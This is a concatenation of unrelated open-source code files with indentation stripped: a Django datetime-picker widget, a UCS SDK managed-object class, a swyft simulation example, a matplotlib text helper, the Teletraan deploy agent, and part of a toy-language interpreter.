# Grab just the language part and try that
language = language_country_code.split('-')[0]
if language in supported_languages:
return language
# Otherwise return English as the default
return 'en'
dateConversiontoPython = {
'P': '%p',
'ss': '%S',
'ii': '%M',
'hh': '%H',
'HH': '%I',
'dd': '%d',
'mm': '%m',
'yy': '%y',
'yyyy': '%Y',
}
toPython_re = re.compile(r'\b(' + '|'.join(dateConversiontoPython.keys()) + r')\b')
dateConversiontoJavascript = {
'%M': 'ii',
'%m': 'mm',
'%I': 'HH',
'%H': 'hh',
'%d': 'dd',
'%Y': 'yyyy',
'%y': 'yy',
'%p': 'P',
'%S': 'ss'
}
toJavascript_re = re.compile(r'(?<!\w)(' + '|'.join(dateConversiontoJavascript.keys()) + r')\b')
BOOTSTRAP_INPUT_TEMPLATE = {
2: """
<div id="%(id)s" class="controls input-append date">
%(rendered_widget)s
%(clear_button)s
<span class="add-on"><i class="icon-th"></i></span>
</div>
<script type="text/javascript">
$("#%(id)s").datetimepicker({%(options)s});
</script>
""",
3: """
<div id="%(id)s" class="input-group date">
%(rendered_widget)s
%(clear_button)s
<span class="input-group-addon"><span class="glyphicon %(glyphicon)s"></span></span>
</div>
<script type="text/javascript">
$("#%(id)s").datetimepicker({%(options)s}).find('input').addClass("form-control");
</script>
"""
}
CLEAR_BTN_TEMPLATE = {2: """<span class="add-on"><i class="icon-remove"></i></span>""",
3: """<span class="input-group-addon"><span class="glyphicon glyphicon-remove"></span></span>"""}
quoted_options = set([
'format',
'startDate',
'endDate',
'startView',
'minView',
'maxView',
'todayBtn',
'language',
'pickerPosition',
'viewSelect',
'initialDate',
'weekStart',
'minuteStep'
'daysOfWeekDisabled',
])
# to traslate boolean object to javascript
quoted_bool_options = set([
'autoclose',
'todayHighlight',
'showMeridian',
'clearBtn',
])
def quote(key, value):
"""Certain options support string values. We want clients to be able to pass Python strings in
but we need them to be quoted in the output. Unfortunately some of those options also allow
numbers so we type check the value before wrapping it in quotes.
"""
if key in quoted_options and isinstance(value, string_types):
return "'%s'" % value
if key in quoted_bool_options and isinstance(value, bool):
return {True:'true',False:'false'}[value]
return value
class PickerWidgetMixin(object):
format_name = None
glyphicon = None
def __init__(self, attrs=None, options=None, usel10n=None, bootstrap_version=None):
if bootstrap_version in [2,3]:
self.bootstrap_version = bootstrap_version
else:
# default 2 to mantain support to old implemetation of django-datetime-widget
self.bootstrap_version = 2
if attrs is None:
attrs = {'readonly': ''}
self.options = options
self.is_localized = False
self.format = None
# We want to have a Javascript style date format specifier in the options dictionary and we
# want a Python style date format specifier as a member variable for parsing the date string
# from the form data
if usel10n is True:
# If we're doing localisation, get the local Python date format and convert it to
# Javascript data format for the options dictionary
self.is_localized = True
# Get format from django format system
self.format = get_format(self.format_name)[0]
# Convert Python format specifier to Javascript format specifier
self.options['format'] = toJavascript_re.sub(
lambda x: dateConversiontoJavascript[x.group()],
self.format
)
# Set the local language
self.options['language'] = get_supported_language(get_language())
else:
# If we're not doing localisation, get the Javascript date format provided by the user,
# with a default, and convert it to a Python data format for later string parsing
format = self.options['format']
self.format = toPython_re.sub(
lambda x: dateConversiontoPython[x.group()],
format
)
super(PickerWidgetMixin, self).__init__(attrs, format=self.format)
def render(self, name, value, renderer=None, attrs=None):
final_attrs = self.build_attrs(attrs)
rendered_widget = super(PickerWidgetMixin, self).render(name, value, final_attrs)
#if not set, autoclose have to be true.
self.options.setdefault('autoclose', True)
# Build javascript options out of python dictionary
options_list = []
for key, value in iter(self.options.items()):
options_list.append("%s: %s" % (key, quote(key, value)))
js_options = ",\n".join(options_list)
# Use provided id or generate hex to avoid collisions in document
id = final_attrs.get('id', uuid.uuid4().hex)
clearBtn = quote('clearBtn', self.options.get('clearBtn', 'true')) == 'true'
return mark_safe(
BOOTSTRAP_INPUT_TEMPLATE[self.bootstrap_version]
% dict(
id=id,
rendered_widget=rendered_widget,
clear_button=CLEAR_BTN_TEMPLATE[self.bootstrap_version] if clearBtn else "",
glyphicon=self.glyphicon,
options=js_options
)
)
def _media(self):
js = ["datetimewidget/js/bootstrap-datetimepicker.js"]
language = self.options.get('language', 'en')
if language != 'en':
js.append("datetimewidget/js/locales/bootstrap-datetimepicker.%s.js" % language)
return widgets.Media(
css={
'all': ('datetimewidget/css/datetimepicker.css',)
},
js=js
)
media = property(_media)
class DateTimeWidget(PickerWidgetMixin, DateTimeInput):
"""
DateTimeWidget is the corresponding widget for Datetime field, it renders both the date and time
sections of the datetime picker.
"""
format_name = 'DATETIME_INPUT_FORMATS'
glyphicon = 'glyphicon-th'
def __init__(self, attrs=None, options=None, usel10n=None, bootstrap_version=None):
if options is None:
options = {}
# Set the default options to show only the datepicker object
options['format'] = options.get('format', 'dd/mm/yyyy hh:ii')
super(DateTimeWidget, self).__init__(attrs, options, usel10n, bootstrap_version)
class DateWidget(PickerWidgetMixin, DateInput):
"""
DateWidget is the corresponding widget for Date field, it renders only the date section of
datetime picker.
"""
format_name = 'DATE_INPUT_FORMATS'
glyphicon = 'glyphicon-calendar'
def __init__(self, attrs=None, options=None, usel10n=None, bootstrap_version=None):
if options is None:
options = {}
# Set the default options to show only the datepicker object
options['startView'] = options.get('startView', 2)
options['minView'] = options.get('minView', 2)
options['format'] = options.get('format', 'dd/mm/yyyy')
super(DateWidget, self).__init__(attrs, options, usel10n, bootstrap_version)
class TimeWidget(PickerWidgetMixin, TimeInput):
"""
TimeWidget is the corresponding widget for Time field, it renders only the time section of
datetime picker.
"""
format_name = 'TIME_INPUT_FORMATS'
glyphicon = 'glyphicon-time'
def __init__(self, attrs=None, options=None, usel10n=None, bootstrap_version=None):
if options is None:
options = {}
# Set the default options to show only the timepicker object
options['startView'] = options.get('startView', 1)
options['minView'] = options.get('minView', 0)
options['maxView'] = options.get('maxView', 1)
options['format'] = options.get('format', 'hh:ii')
super(TimeWidget, self).__init__(attrs, options, usel10n, bootstrap_version)
|
the-stack_0_25875
|
"""This module contains the general information for EquipmentStorageControllerConfig ManagedObject."""
import sys, os
from ...ucsmo import ManagedObject
from ...ucscoremeta import UcsVersion, MoPropertyMeta, MoMeta
from ...ucsmeta import VersionMeta
class EquipmentStorageControllerConfigConsts():
INT_ID_NONE = "none"
POLICY_OWNER_LOCAL = "local"
POLICY_OWNER_PENDING_POLICY = "pending-policy"
POLICY_OWNER_POLICY = "policy"
SUB_OEM_ID_UNDEFINED = "undefined"
class EquipmentStorageControllerConfig(ManagedObject):
"""This is EquipmentStorageControllerConfig class."""
consts = EquipmentStorageControllerConfigConsts()
naming_props = set([u'vendor', u'device', u'subvendor', u'subdevice'])
mo_meta = MoMeta("EquipmentStorageControllerConfig", "equipmentStorageControllerConfig", "ven-[vendor]-dev-[device]-subven-[subvendor]-subdev-[subdevice]", VersionMeta.Version225a, "InputOutput", 0xfff, [], [""], [u'diagSrvCapProvider', u'equipmentBladeCapProvider', u'equipmentCatalogCapProvider', u'equipmentChassisCapProvider', u'equipmentDbgPluginCapProvider', u'equipmentMgmtCapProvider', u'equipmentMgmtExtCapProvider', u'equipmentRackUnitCapProvider', u'equipmentServerUnitCapProvider', u'equipmentSwitchCapProvider'], [], ["Get"])
prop_meta = {
"child_action": MoPropertyMeta("child_action", "childAction", "string", VersionMeta.Version225a, MoPropertyMeta.INTERNAL, 0x2, None, None, r"""((deleteAll|ignore|deleteNonPresent),){0,2}(deleteAll|ignore|deleteNonPresent){0,1}""", [], []),
"descr": MoPropertyMeta("descr", "descr", "string", VersionMeta.Version225a, MoPropertyMeta.READ_WRITE, 0x4, None, None, r"""[ !#$%&\(\)\*\+,\-\./:;\?@\[\]_\{\|\}~a-zA-Z0-9]{0,256}""", [], []),
"device": MoPropertyMeta("device", "device", "uint", VersionMeta.Version225a, MoPropertyMeta.NAMING, 0x8, None, None, None, [], []),
"dn": MoPropertyMeta("dn", "dn", "string", VersionMeta.Version225a, MoPropertyMeta.READ_ONLY, 0x10, 0, 256, None, [], []),
"int_id": MoPropertyMeta("int_id", "intId", "string", VersionMeta.Version225a, MoPropertyMeta.INTERNAL, None, None, None, None, ["none"], ["0-4294967295"]),
"name": MoPropertyMeta("name", "name", "string", VersionMeta.Version225a, MoPropertyMeta.READ_WRITE, 0x20, None, None, r"""[\-\.:_a-zA-Z0-9]{0,16}""", [], []),
"policy_level": MoPropertyMeta("policy_level", "policyLevel", "uint", VersionMeta.Version225a, MoPropertyMeta.READ_ONLY, None, None, None, None, [], []),
"policy_owner": MoPropertyMeta("policy_owner", "policyOwner", "string", VersionMeta.Version225a, MoPropertyMeta.READ_WRITE, 0x40, None, None, None, ["local", "pending-policy", "policy"], []),
"rn": MoPropertyMeta("rn", "rn", "string", VersionMeta.Version225a, MoPropertyMeta.READ_ONLY, 0x80, 0, 256, None, [], []),
"sacl": MoPropertyMeta("sacl", "sacl", "string", VersionMeta.Version311e, MoPropertyMeta.READ_ONLY, None, None, None, r"""((none|del|mod|addchild|cascade),){0,4}(none|del|mod|addchild|cascade){0,1}""", [], []),
"status": MoPropertyMeta("status", "status", "string", VersionMeta.Version225a, MoPropertyMeta.READ_WRITE, 0x100, None, None, r"""((removed|created|modified|deleted),){0,3}(removed|created|modified|deleted){0,1}""", [], []),
"storage_bios_mode": MoPropertyMeta("storage_bios_mode", "storageBiosMode", "string", VersionMeta.Version225a, MoPropertyMeta.READ_ONLY, None, 0, 510, None, [], []),
"storagepid": MoPropertyMeta("storagepid", "storagepid", "string", VersionMeta.Version225a, MoPropertyMeta.READ_ONLY, None, 0, 510, None, [], []),
"sub_oem_id": MoPropertyMeta("sub_oem_id", "subOemId", "string", VersionMeta.Version225a, MoPropertyMeta.READ_ONLY, None, None, None, None, ["undefined"], ["0-4294967295"]),
"subdevice": MoPropertyMeta("subdevice", "subdevice", "uint", VersionMeta.Version225a, MoPropertyMeta.NAMING, 0x200, None, None, None, [], []),
"subvendor": MoPropertyMeta("subvendor", "subvendor", "uint", VersionMeta.Version225a, MoPropertyMeta.NAMING, 0x400, None, None, None, [], []),
"vendor": MoPropertyMeta("vendor", "vendor", "uint", VersionMeta.Version225a, MoPropertyMeta.NAMING, 0x800, None, None, None, [], []),
}
prop_map = {
"childAction": "child_action",
"descr": "descr",
"device": "device",
"dn": "dn",
"intId": "int_id",
"name": "name",
"policyLevel": "policy_level",
"policyOwner": "policy_owner",
"rn": "rn",
"sacl": "sacl",
"status": "status",
"storageBiosMode": "storage_bios_mode",
"storagepid": "storagepid",
"subOemId": "sub_oem_id",
"subdevice": "subdevice",
"subvendor": "subvendor",
"vendor": "vendor",
}
def __init__(self, parent_mo_or_dn, vendor, device, subvendor, subdevice, **kwargs):
self._dirty_mask = 0
self.vendor = vendor
self.device = device
self.subvendor = subvendor
self.subdevice = subdevice
self.child_action = None
self.descr = None
self.int_id = None
self.name = None
self.policy_level = None
self.policy_owner = None
self.sacl = None
self.status = None
self.storage_bios_mode = None
self.storagepid = None
self.sub_oem_id = None
ManagedObject.__init__(self, "EquipmentStorageControllerConfig", parent_mo_or_dn, **kwargs)
|
the-stack_0_25876
|
import numpy as np
import torch
import swyft
prior = swyft.Prior(
{
"ox": ["uniform", 0.0, 10.0],
"oy": ["uniform", 0.0, 10.0],
"a": ["uniform", 1.0, 2.0],
"p1": ["uniform", 0.0, 0.5],
"p2": ["uniform", 1.0, 2.0],
}
)
def simulator(a, ox, oy, p1, p2, sigma=0.1):
"""Some examplary image simulator."""
x = np.linspace(-5, 5, 50, 50)
X, Y = np.meshgrid(x, x)
diff = np.cos(X + ox) * np.cos(Y + oy) * a + 2
p = np.random.randn(*X.shape) * p1 - 0.3
psc = 10 ** p * p2
n = np.random.randn(*X.shape) * sigma
mu = diff * 5 + psc + n
return mu
def model(params):
"""Model wrapper around simulator code."""
mu = simulator(params["a"], params["ox"], params["oy"], params["p1"], params["p2"])
return dict(mu=mu)
def noise(obs, params=None, sigma=1.0):
"""Associated noise model."""
data = {k: v + np.random.randn(*v.shape) * sigma for k, v in obs.items()}
return data
class CustomHead(swyft.Module):
def __init__(self, obs_shapes):
super().__init__(obs_shapes=obs_shapes)
self.n_features = 10
self.conv1 = torch.nn.Conv2d(1, 10, 5)
self.conv2 = torch.nn.Conv2d(10, 20, 5)
self.conv3 = torch.nn.Conv2d(20, 40, 5)
self.pool = torch.nn.MaxPool2d(2)
self.l = torch.nn.Linear(160, 10)
def forward(self, obs):
x = obs["mu"].unsqueeze(1)
nbatch = len(x)
# x = torch.log(0.1+x)
x = self.conv1(x)
x = self.pool(x)
x = self.conv2(x)
x = self.pool(x)
x = self.conv3(x)
x = self.pool(x)
x = x.view(nbatch, -1)
x = self.l(x)
return x
par0 = dict(ox=5.0, oy=5.0, a=1.5, p1=0.4, p2=1.1)
obs0 = noise(model(par0))
|
the-stack_0_25881
|
import sympy
class Text:
matplotlib_obj = None
def __init__(self, xy, text, color, fontsize, offset, halignment, valignment, bbox, latex, pixel, mplprops, figure):
if not isinstance(color, list):
offset = [offset]
color = [color]
xy = [xy]
text = [text]
halignment = [halignment]
valignment = [valignment]
bbox = [bbox]
latex = [latex]
pixel = [pixel]
self.matplotlib_obj = []
self.xy = xy
self.text = text
self.color = color
self.fontsize = fontsize
self.halignment = halignment
self.valignment = valignment
self.bbox = bbox
self.latex = latex
self.figure = figure
self.mplprops = mplprops
self.pixel = pixel
self.offset = offset
def __draw__(self, zorder=1):
for xy, text, color, offset, valignment, halignment, bbox, latex, pixel in zip(self.xy, self.text, self.color, self.offset, self.valignment, self.halignment, self.bbox, self.latex, self.pixel):
if pixel:
x=self.figure.px2unit(xy[0], 'x')+self.figure.px2unit(offset[0], 'x')
y=self.figure.px2unit(xy[1], 'y')+self.figure.px2unit(offset[1], 'y')
else:
x=xy[0]+self.figure.px2unit(offset[0], 'x')
y=xy[1]+self.figure.px2unit(offset[1], 'y')
obj = self.figure.ax.text(x,y,
"$" + sympy.latex(text) + "$" if latex else text, fontsize=self.fontsize,
horizontalalignment=halignment, verticalalignment=valignment, bbox=bbox,
color=color, zorder=zorder, clip_on=False, **self.mplprops
)
obj.set_clip_on(False)
self.matplotlib_obj.append(obj)
def serialize(self):
arr = []
for i in range(0, len(self.xy)):
arr.append({
"type": "Text",
"text": ("$" + sympy.latex(self.text[i]) + "$" if self.latex[i] else self.text[i]),
"position": [float(x) for x in self.xy[i]],
"xAlign": {"left": -1, "center": 0, "right": 1}[self.halignment[i]],
"yAlign": {"bottom": -1, "center": 0, "top": 1}[self.valignment[i]],
"fontSize": str(self.fontsize) + "pt",
"color": self.color[i]
})
return arr
|
the-stack_0_25882
|
# Copyright 2016 Pinterest, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import os
from random import randrange
import time
import traceback
import daemon
import logging
from deployd.client.client import Client
from deployd.client.serverless_client import ServerlessClient
from deployd.common.config import Config
from deployd.common.exceptions import AgentException
from deployd.common.helper import Helper
from deployd.common.single_instance import SingleInstance
from deployd.common.env_status import EnvStatus
from deployd.common import utils
from deployd.common.executor import Executor
from deployd.common.types import DeployReport, PingStatus, DeployStatus, OpCode, \
DeployStage, AgentStatus
from deployd import IS_PINTEREST
log = logging.getLogger(__name__)
class PingServer(object):
def __init__(self, ag):
self._agent = ag
def __call__(self, deploy_report):
return self._agent.update_deploy_status(deploy_report=deploy_report)
class AgentRunMode(object):
SERVERLESS = "serverless"
@staticmethod
def is_serverless(mode):
return AgentRunMode.SERVERLESS == mode
class DeployAgent(object):
_STATUS_FILE = None
_curr_report = None
_config = None
_env_status = None
def __init__(self, client, estatus=None, conf=None, executor=None, helper=None):
self._response = None
# a map maintains env_name -> deploy_status
self._envs = {}
self._config = conf or Config()
self._executor = executor
self._helper = helper or Helper(self._config)
self._STATUS_FILE = self._config.get_env_status_fn()
self._client = client
self._env_status = estatus or EnvStatus(self._STATUS_FILE)
# load environment deploy status file from local disk
self.load_status_file()
def load_status_file(self):
self._envs = self._env_status.load_envs()
if not self._envs:
self._envs = {}
self._curr_report = None
return
self._curr_report = self._envs.values()[0]
self._config.update_variables(self._curr_report)
def serve_build(self):
"""This is the main function of the ``DeployAgent``.
"""
log.info('The deploy agent is starting.')
if not self._executor:
self._executor = Executor(callback=PingServer(self), config=self._config)
# start to ping server to get the latest deploy goal
self._response = self._client.send_reports(self._envs)
if self._response:
report = self._update_internal_deploy_goal(self._response)
# failed to update
if report.status_code != AgentStatus.SUCCEEDED:
self._update_ping_reports(deploy_report=report)
self._client.send_reports(self._envs)
return
while self._response and self._response.opCode and self._response.opCode != OpCode.NOOP:
try:
# update the current deploy goal
if self._response.deployGoal:
deploy_report = self.process_deploy(self._response)
else:
log.info('No new deploy goal to get updated')
deploy_report = DeployReport(AgentStatus.SUCCEEDED)
if deploy_report.status_code == AgentStatus.ABORTED_BY_SERVER:
log.info('switch to the new deploy goal: {}'.format(self._response.deployGoal))
continue
except Exception:
# anything catch-up here should be treated as agent failure
deploy_report = DeployReport(status_code=AgentStatus.AGENT_FAILED,
error_code=1,
output_msg=traceback.format_exc(),
retry_times=1)
self.update_deploy_status(deploy_report)
if deploy_report.status_code in [AgentStatus.AGENT_FAILED,
AgentStatus.TOO_MANY_RETRY,
AgentStatus.SCRIPT_TIMEOUT]:
log.error('Unexpeted exceptions: {}, error message {}'.format(
deploy_report.status_code, deploy_report.output_msg))
return
self.clean_stale_builds()
if self._response and self._response.deployGoal:
self._update_internal_deploy_goal(self._response)
if self._response:
log.info('Complete the current deploy with response: {}.'.format(self._response))
else:
log.info('Failed to get response from server, exit.')
def serve_forever(self):
log.info("Running deploy agent in daemon mode")
while True:
try:
self.serve_build()
except:
log.exception("Deploy Agent got exception: {}".format(traceback.format_exc()))
finally:
time.sleep(self._config.get_daemon_sleep_time())
self.load_status_file()
def serve_once(self):
log.info("Running deploy agent in non daemon mode")
try:
if len(self._envs) > 0:
# randomly sleep some time before pinging server
sleep_secs = randrange(self._config.get_init_sleep_time())
log.info("Randomly sleep {} seconds before starting.".format(sleep_secs))
time.sleep(sleep_secs)
else:
log.info("No status file. Could be first time agent ran")
self.serve_build()
except Exception:
log.exception("Deploy Agent got exceptions: {}".format(traceback.format_exc()))
def _resolve_deleted_env_name(self, envName, envId):
# When server return DELETE goal, the envName might be empty if the env has already been
# deleted. This function would try to figure out the envName based on the envId in the
# DELETE goal.
if envName:
return envName
for name, value in self._envs.iteritems():
if envId == value.report.envId:
return name
return None
def process_deploy(self, response):
op_code = response.opCode
deploy_goal = response.deployGoal
if op_code == OpCode.TERMINATE or op_code == OpCode.DELETE:
envName = self._resolve_deleted_env_name(deploy_goal.envName, deploy_goal.envId)
if envName in self._envs:
del self._envs[envName]
else:
log.info('Cannot find env {} in the ping report'.format(envName))
if self._curr_report.report.envName == deploy_goal.envName:
self._curr_report = None
return DeployReport(AgentStatus.SUCCEEDED, retry_times=1)
else:
curr_stage = deploy_goal.deployStage
'''
DOWNLOADING and STAGING are two reserved deploy stages owned by agent:
DOWNLOADING: download the tarball from pinrepo
STAGING: In this step, deploy agent will chmod and change the symlink pointing to
new service code, and etc.
'''
if curr_stage == DeployStage.DOWNLOADING:
return self._executor.run_cmd(self.get_download_script(deploy_goal=deploy_goal))
elif curr_stage == DeployStage.STAGING:
log.info("set up symbolink for the package: {}".format(deploy_goal.deployId))
return self._executor.run_cmd(self.get_staging_script())
else:
return self._executor.execute_command(curr_stage)
# provides command line to start download scripts or tar ball.
def get_download_script(self, deploy_goal):
if not (deploy_goal.build and deploy_goal.build.artifactUrl):
raise AgentException('Cannot find build or build url in the deploy goal')
url = deploy_goal.build.artifactUrl
build = deploy_goal.build.buildId
env_name = self._curr_report.report.envName
if not self._config.get_config_filename():
return ['deploy-downloader', '-v', build, '-u', url, "-e", env_name]
else:
return ['deploy-downloader', '-f', self._config.get_config_filename(),
'-v', build, '-u', url, "-e", env_name]
def get_staging_script(self):
build = self._curr_report.build_info.build_id
env_name = self._curr_report.report.envName
if not self._config.get_config_filename():
return ['deploy-stager', '-v', build, '-t', self._config.get_target(), "-e", env_name]
else:
return ['deploy-stager', '-f', self._config.get_config_filename(),
'-v', build, '-t', self._config.get_target(), "-e", env_name]
def _update_ping_reports(self, deploy_report):
if self._curr_report:
self._curr_report.update_by_deploy_report(deploy_report)
# if we failed to dump the status to the disk. We should notify the server
# as agent failure. We set the current report to be agent failure, so server would
# tell agent to abort current deploy, then exit
result = self._env_status.dump_envs(self._envs)
if (not result) and self._curr_report:
self._curr_report.update_by_deploy_report(
DeployReport(status_code=AgentStatus.AGENT_FAILED,
error_code=1,
output_msg='Failed to dump status to the disk'))
def update_deploy_status(self, deploy_report):
self._update_ping_reports(deploy_report=deploy_report)
response = self._client.send_reports(self._envs)
# if we failed to get any response from server, set the self._response to None
if response is None:
log.info('Failed to get response from server')
self._response = None
return PingStatus.PING_FAILED
else:
plan_changed = DeployAgent.plan_changed(self._response, response)
self._response = response
report = self._update_internal_deploy_goal(self._response)
if report.status_code != AgentStatus.SUCCEEDED:
self._update_ping_reports(report)
self._response = self._client.send_reports(self._envs)
return PingStatus.PLAN_CHANGED
if plan_changed:
return PingStatus.PLAN_CHANGED
else:
return PingStatus.PLAN_NO_CHANGE
def clean_stale_builds(self):
if not self._envs:
return
if not (self._curr_report and self._curr_report.report):
return
builds_to_keep = [status.build_info.build_id for status in self._envs.values()
if status.build_info]
builds_dir = self._config.get_builds_directory()
num_retain_builds = self._config.get_num_builds_retain()
env_name = self._curr_report.report.envName
# clear stale builds
if len(builds_to_keep) > 0:
self.clean_stale_files(env_name, builds_dir, builds_to_keep, num_retain_builds)
def clean_stale_files(self, env_name, dir, files_to_keep, num_file_to_retain):
for build in self._helper.get_stale_builds(self._helper.builds_available_locally(dir,env_name),
num_file_to_retain):
if build not in files_to_keep:
log.info("Stale file {} found in {}... removing.".format(
build, dir))
self._helper.clean_package(dir, build, env_name)
# private functions: update per deploy step configuration specified by services owner on the
# environment config page
def _update_internal_deploy_goal(self, response):
deploy_goal = response.deployGoal
if not deploy_goal:
log.info('No deploy goal to be updated.')
return DeployReport(status_code=AgentStatus.SUCCEEDED)
# use envName as status map key
env_name = deploy_goal.envName
if (self._envs is None) or (self._envs.get(env_name) is None):
self._envs[env_name] = DeployStatus()
# update deploy_status from response for the environment
self._envs[env_name].update_by_response(response)
# update script variables
if deploy_goal.scriptVariables:
log.info('Start to generate script variables for deploy: {}'.
format(deploy_goal.deployId))
env_dir = self._config.get_agent_directory()
working_dir = os.path.join(env_dir, "{}_SCRIPT_CONFIG".format(env_name))
with open(working_dir, "w+") as f:
for key, value in deploy_goal.scriptVariables.items():
f.write("{}={}\n".format(key, value))
# load deploy goal to the config
self._curr_report = self._envs[env_name]
self._config.update_variables(self._curr_report)
self._executor.update_configs(self._config)
log.info('current deploy goal is: {}'.format(deploy_goal))
return DeployReport(status_code=AgentStatus.SUCCEEDED)
def _update_deploy_alias(self, deploy_goal):
env_name = deploy_goal.envName
if not self._envs or (env_name not in self._envs):
log.warning('Env name does not exist, ignore it.')
elif deploy_goal.deployAlias:
self._envs[env_name].deployAlias = deploy_goal.deployAlias
log.warning('Update deploy alias to {} for {}'.format(deploy_goal.deployAlias,
deploy_goal.envName))
@staticmethod
def plan_changed(old_response, new_response):
if not old_response:
return new_response
# if the opcode has changed
if old_response.opCode != new_response.opCode:
return True
if not old_response.deployGoal:
return new_response.deployGoal
if not new_response.deployGoal:
return old_response.deployGoal
# if this a new deploy
if old_response.deployGoal.deployId != new_response.deployGoal.deployId:
return True
# if this is a new deploy stage
if old_response.deployGoal.deployStage != new_response.deployGoal.deployStage:
return True
return False
# make sure only one instance is running
instance = SingleInstance()
def main():
parser = argparse.ArgumentParser(description=__doc__)
parser.add_argument('-e', '--server_stage', dest='stage', default='prod',
help="This option is deprecated")
parser.add_argument('-f', '--config-file', dest='config_file', required=False,
help="the deploy agent config file path.")
parser.add_argument('-d', '--daemon', dest="daemon", action='store_true',
help="Run deploy agent in daemon mode. Default is false.")
parser.add_argument('-n', '--host', dest="hostname", required=False, default=None,
help="Host name being used when interact with Teletraan service. "
"This is optional. By default the hostname defined in host-info "
"file will be used")
parser.add_argument('-g', '--group', dest='hostgroup', required=False, default=None,
help="Group name being used when interact with Teletraan service. "
"This is optional. By default the group name defined in host-info "
"file will be used")
parser.add_argument('--use-facter', dest='use_facter', action='store_true', default=False)
parser.add_argument('--use-host-info', dest='use_host_info', action='store_true', default=False)
parser.add_argument('--mode', dest='mode', default=None,
help="Optional. 'serverless' is the only non default mode supported. "
"In this mode, agent can be run for one time deployment without "
"interacting with teletraan service.")
parser.add_argument('--build', dest='build', default=None,
help="Optional. In 'serverless' mode, build information is needed in "
"json format.")
parser.add_argument('--env-name', dest='env_name', default=None,
help="Optional. In 'serverless' mode, env_name needs to be passed in.")
parser.add_argument('--script-variables', dest='script_variables', default='{}',
help="Optional. In 'serverless' mode, script_variables is needed in "
"json format.")
args = parser.parse_args()
is_serverless_mode = AgentRunMode.is_serverless(args.mode)
if args.daemon and is_serverless_mode:
raise ValueError("daemon and serverless mode is mutually exclusive.")
config = Config(args.config_file)
utils.run_prereqs(config)
if IS_PINTEREST:
import pinlogger
pinlogger.initialize_logger(logger_filename='deploy-agent.log')
pinlogger.LOG_TO_STDERR = True
else:
log_filename = os.path.join(config.get_log_directory(), 'deploy-agent.log')
logging.basicConfig(filename=log_filename, level=config.get_log_level(),
format='%(asctime)s %(name)s:%(lineno)d %(levelname)s %(message)s')
log.info("Start to run deploy-agent.")
client = Client(config=config, hostname=args.hostname, hostgroup=args.hostgroup,
use_facter=args.use_facter, use_host_info=args.use_host_info)
if is_serverless_mode:
log.info("Running agent with severless client")
client = ServerlessClient(env_name=args.env_name, stage=args.stage, build=args.build,
script_variables=args.script_variables)
agent = DeployAgent(client=client, conf=config)
utils.listen()
if args.daemon:
logger = logging.getLogger()
handles = []
for handler in logger.handlers:
handles.append(handler.stream.fileno())
with daemon.DaemonContext(files_preserve=handles):
agent.serve_forever()
else:
agent.serve_once()
if __name__ == '__main__':
main()
|
the-stack_0_25883
|
import ast
import object
import builtin_function
import environment
from typing import List
TRUE = object.Boolean(value=True)
FALSE = object.Boolean(value=False)
NULL = object.Null()
def evals(node: ast.Node, env: environment.Environment) -> object.Object:
if isinstance(node, ast.Programs):
return eval_program(node, env)
elif isinstance(node, ast.BlockStatement):
return eval_block_statement(node, env)
elif isinstance(node, ast.ExpressionStatement):
return evals(node.expression, env)
elif isinstance(node, ast.ReturnStatement):
val = evals(node.return_value, env)
if is_error(val):
return val
return object.ReturnValue(value=val)
elif isinstance(node, ast.LetStatement):
val = evals(node.value, env)
if is_error(val):
return val
env.set(node.name.value, val)
elif isinstance(node, ast.ArrayLiteral):
elements = eval_expression(node.elements, env)
if len(elements) == 1 and is_error(elements[0]):
return elements[0]
arr = object.Array()
arr.elements = elements
return arr
elif isinstance(node, ast.IndexExpression):
left = evals(node.left, env)
if is_error(left):
return left
index = evals(node.index, env)
if is_error(index):
return index
return eval_indexexpression(left, index)
elif isinstance(node, ast.HashLiteral):
return eval_hashliteral(node, env)
# expressions
elif isinstance(node, ast.IntegerLiteral):
return object.Integer(value=node.value)
elif isinstance(node, ast.Boolean):
return native_bool_2_boolean_object(node.value)
elif isinstance(node, ast.StringLiteral):
return object.String(value=node.value)
elif isinstance(node, ast.PrefixExpression):
right = evals(node.right, env)
if is_error(right):
return right
return eval_prefix_expression(node.operator, right)
elif isinstance(node, ast.InfixExpression):
left = evals(node.left, env)
if is_error(left):
return left
right = evals(node.right, env)
if is_error(right):
return right
return eval_infix_expression(node.operator, left, right)
elif isinstance(node, ast.IfExpression):
return eval_ifexpression(node, env)
elif isinstance(node, ast.Identifier):
return eval_identifier(node, env)
elif isinstance(node, ast.FunctionLiteral):
params = node.parameters
body = node.body
return object.Function(params=params,
env=env,
body=body)
elif isinstance(node, ast.CallExpression):
function = evals(node.function, env)
if is_error(function):
return function
args = eval_expression(node.arguments, env)
if len(args) == 1 and is_error(args[0]):
return args[0]
return apply_function(function, args)
else:
return None
def apply_function(fn: object.Object, args: List[object.Object]) -> object.Object:
if isinstance(fn, object.Function):
extend_env = extend_function_env(fn, args)
evaluated = evals(fn.body, extend_env)
return unwrap_return_value(evaluated)
elif isinstance(fn, object.Builtin):
return fn.fn(args)
else:
return new_error('not a function: {}'.format(fn.type()))
def extend_function_env(fn: object.Function,
args: List[object.Object]) -> environment.Environment:
en_env = environment.EnvironmentEnclosed()
en_env.store = fn.env.store
env = environment.new_enclosed_environment(en_env)
for ind, param in enumerate(fn.parameters):
env.set(param.value, args[ind])
return env
def unwrap_return_value(obj: object.Object) -> object.Object:
if isinstance(obj, object.ReturnValue):
return obj.value
return obj
def eval_expression(exps: List[ast.Expression],
env: environment.Environment) -> List[object.Object]:
result = []
for e in exps:
evaluated = evals(e, env)
if is_error(evaluated):
return [evaluated]
result.append(evaluated)
return result
def eval_identifier(node: ast.Identifier, env: environment.Environment) -> object.Object:
val, ok = env.get(node.value)
if ok:
return val
built_in = builtin_function.builtin_func.get(node.value, 'error')
if built_in != 'error':
return built_in
return new_error('identifier not found: ' + node.value)
def eval_block_statement(block: ast.BlockStatement, env: environment.Environment) -> object.Object:
result = object.Object()
for stmt in block.statements:
result = evals(stmt, env)
if result is not None:
rt = result.type()
if rt == object.ObjectType.RETURN_VALUE_OBJ or rt == object.ObjectType.ERROR_OBJ:
return result
return result
def eval_program(program: ast.Programs, env: environment.Environment) -> object.Object:
result = object.Object()
for stmt in program.statements:
result = evals(stmt, env)
